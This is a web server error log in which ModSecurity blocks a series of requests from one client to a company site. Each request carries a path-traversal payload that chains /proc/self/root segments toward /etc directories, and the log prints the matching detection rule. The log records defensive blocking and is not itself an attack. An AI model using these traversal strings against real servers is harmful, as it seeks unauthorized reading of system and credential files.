[Fri Mar 20 07:48:46.700407 2026] [:error] [pid 7893:tid 140411557287680] [client 74.7.243.128:58648] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0mDhCii7xarUs8iHZl9gAAAhY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 07:48:48.047238 2026] [:error] [pid 21219:tid 140411599251200] [client 74.7.243.128:58652] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0mEPXLqtnMIWvjpaKYzAAAApE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 07:48:49.430941 2026] [:error] [pid 11167:tid 140411733534464] [client 74.7.243.128:42290] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0mEfHIg5MgXLBnicP2NwAAAcE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 07:48:50.679918 2026] [:error] [pid 21219:tid 140411574073088] [client 74.7.243.128:42298] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0mEvXLqtnMIWvjpaKY0AAAApQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 07:48:51.922983 2026] [:error] [pid 7893:tid 140411582465792] [client 74.7.243.128:42312] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0mExCii7xarUs8iHZl-QAAAhM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 07:48:53.226969 2026] [:error] [pid 11642:tid 140411582465792] [client 74.7.243.128:42314] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0mFbninkcc-iUj5ApdcgAAA5M"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 07:48:54.511906 2026] [:error] [pid 7235:tid 140411624429312] [client 74.7.243.128:42322] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0mFvqxLDW4GITHUkTlMwAAAQ4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 07:48:56.950944 2026] [:error] [pid 7235:tid 140411540502272] [client 74.7.243.128:42336] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0mGPqxLDW4GITHUkTlOwAAARg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 07:48:58.365641 2026] [:error] [pid 15826:tid 140411683178240] [client 74.7.243.128:42340] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0mGuoXxyEfFpUF8f9_xAAAAUc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 07:48:59.723497 2026] [:error] [pid 21219:tid 140411708356352] [client 74.7.243.128:34290] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0mG_XLqtnMIWvjpaKY0wAAAoQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 07:49:01.054211 2026] [:error] [pid 9818:tid 140411557287680] [client 74.7.243.128:34300] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0mHV1pVZ5mVmJwsFMujQAAAFY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 07:49:03.999084 2026] [:error] [pid 31215:tid 140411540502272] [client 74.7.243.128:34316] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0mHgF0L0L-SsrnPo5nlgAAAtg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 07:49:05.407159 2026] [:error] [pid 10189:tid 140411599251200] [client 74.7.243.128:34330] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0mITJ3M9BSuKP7CAYZbAAAAJE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 07:49:06.733482 2026] [:error] [pid 26799:tid 140411658000128] [client 74.7.243.128:34344] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0mIta6ubjKNq_cu4bSawAAA0o"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 07:49:08.005060 2026] [:error] [pid 7893:tid 140411624429312] [client 74.7.243.128:34356] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0mJBCii7xarUs8iHZl_gAAAg4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 07:49:09.338929 2026] [:error] [pid 7893:tid 140411557287680] [client 74.7.243.128:34366] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0mJRCii7xarUs8iHZmAgAAAhY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 07:49:10.686674 2026] [:error] [pid 7893:tid 140411716749056] [client 74.7.243.128:54520] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0mJhCii7xarUs8iHZmBQAAAgM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 07:49:11.975542 2026] [:error] [pid 21219:tid 140411599251200] [client 74.7.243.128:54536] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/percona-server.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0mJ_XLqtnMIWvjpaKY2gAAApE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 07:49:13.179539 2026] [:error] [pid 7235:tid 140411616036608] [client 74.7.243.128:54552] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0mKfqxLDW4GITHUkTlUwAAAQ8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 07:49:14.513218 2026] [:error] [pid 11642:tid 140411666392832] [client 74.7.243.128:54564] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0mKrninkcc-iUj5ApdgwAAA4k"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Fri Mar 20 07:49:15.875387 2026] [:error] [pid 11167:tid 140411574073088] [client 74.7.243.128:54572] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab0mK_HIg5MgXLBnicP2QwAAAdQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
